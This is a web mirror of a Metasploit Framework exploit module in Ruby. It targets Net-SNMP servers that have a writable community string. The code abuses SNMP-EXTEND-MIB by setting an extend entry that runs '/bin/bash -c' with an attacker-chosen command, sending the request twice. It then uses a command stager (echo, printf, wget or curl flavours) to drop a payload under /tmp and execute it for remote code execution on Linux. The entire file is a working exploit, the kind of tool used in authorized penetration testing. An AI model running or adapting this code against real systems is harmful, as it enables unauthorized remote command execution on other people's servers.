Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
19516 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'snmp'

7


8
class MetasploitModule < Msf::Exploit::Remote

9
  Rank = NormalRanking

10


11
  include Msf::Exploit::Remote::SNMPClient

12
  include Msf::Exploit::CmdStager

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution',

19
        'Description' => %q{

20
          This exploit module exploits the SNMP write access configuration ability of SNMP-EXTEND-MIB to

21
          configure MIB extensions and lead to remote code execution.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => ['Steve Embling at InteliSecure'],

25
        'References' => [

26
          [ 'URL', 'http://net-snmp.sourceforge.net/docs/mibs/NET-SNMP-EXTEND-MIB.txt'],

27
          [ 'URL', 'https://medium.com/rangeforce/snmp-arbitrary-command-execution-19a6088c888e'],

28
          [ 'URL', 'https://digi.ninja/blog/snmp_to_shell.php'],

29
          [ 'URL', 'https://sourceforge.net/p/net-snmp/mailman/message/15735617/']

30
        ],

31
        'Payload' => {

32
          'Space' => 4096

33
          # note space above is not a hard limit and can be increased if required

34
          # 'BadChars' => "\x00"

35
        },

36
        'Targets' => [

37
          [

38
            'Linux x86', {

39
              'Arch' => ARCH_X86,

40
              'Platform' => 'linux',

41
              'CmdStagerFlavor' => [ :echo, :printf, :bourne, :wget, :curl ]

42
            }

43
          ],

44
          [

45
            'Linux x64', {

46
              'Arch' => ARCH_X64,

47
              'Platform' => 'linux',

48
              'CmdStagerFlavor' => [ :echo, :printf, :bourne, :wget, :curl ]

49
            }

50
          ]

51
        ],

52
        # Not tested on other platforms but confirmed the above works.

53
        'DisclosureDate' => '2004-05-10',

54
        'DefaultTarget' => 0,

55
        'Notes' => {

56
          'Reliability' => UNKNOWN_RELIABILITY,

57
          'Stability' => UNKNOWN_STABILITY,

58
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

59
        }

60
      )

61
    )

62
    register_options(

63
      [

64
        OptString.new('FILEPATH', [true, 'file path to write to ', '/tmp']),

65
        OptString.new('CHUNKSIZE', [true, 'Maximum bytes of payload to write at once ', 200]),

66
        OptString.new('SHELL', [true, 'Shell to call with -c argument', '/bin/bash'])

67
      ]

68
    )

69
  end

70


71
  # The exploit method connects and sets:

72
  # NET-SNMP-EXTEND-MIB::nsExtendStatus."tmp" = INTEGER: createAndGo(4)

73
  # NET-SNMP-EXTEND-MIB::nsExtendCommand."tmp" = STRING: /path/to/executable

74
  # NET-SNMP-EXTEND-MIB::nsExtendArgs."tmp" = STRING: arguments

75
  def execute_command(cmd, opts = {})

76
    oid_1 = '1.3.6.1.4.1.8072.1.3.2.2.1.21.3.116.109.112'

77
    oid_1_value = 4

78
    oid_2 = '1.3.6.1.4.1.8072.1.3.2.2.1.2.3.116.109.112'

79
    oid_2_value = datastore['SHELL']

80
    oid_3 = '1.3.6.1.4.1.8072.1.3.2.2.1.3.3.116.109.112'

81
    oid_4 = '1.3.6.1.4.1.8072.1.3.2.4.1.2.3.116.109.112.1'

82


83
    comm = datastore['COMMUNITY']

84


85
    cmd = cmd.shellescape unless flavor == :bourne

86


87
    oid_3_value = "-c \"#{cmd}\""

88


89
    vprint_status(oid_3_value)

90
    SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => comm) do |manager|

91
      # vprint_status(manager.get_value("sysDescr.0"))

92
      varbind1 = SNMP::VarBind.new(oid_1, SNMP::Integer.new(oid_1_value))

93
      varbind2 = SNMP::VarBind.new(oid_2, SNMP::OctetString.new(oid_2_value))

94
      varbind3 = SNMP::VarBind.new(oid_3, SNMP::OctetString.new(oid_3_value))

95
      resp = manager.set([varbind1, varbind2, varbind3])

96
      vprint_status(manager.get_value(oid_4).to_s)

97
    end

98
    # Hit same again, first rewrite  appears to remove the MIB, the next reinstates it.

99
    SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => comm) do |manager|

100
      varbind1 = SNMP::VarBind.new(oid_1, SNMP::Integer.new(oid_1_value))

101
      varbind2 = SNMP::VarBind.new(oid_2, SNMP::OctetString.new(oid_2_value))

102
      varbind3 = SNMP::VarBind.new(oid_3, SNMP::OctetString.new(oid_3_value))

103
      begin

104
        resp = manager.set([varbind1, varbind2, varbind3])

105
        vprint_status(manager.get_value(oid_4).to_s)

106
      rescue SNMP::RequestTimeout

107
        print_good("SNMP request timeout (this is promising).")

108
      end

109
    end

110
  end

111


112
  def exploit

113
    execute_cmdstager(linemax: datastore['CHUNKSIZE'].to_i, :temp => datastore['FILEPATH'])

114
  end

115
end

116


117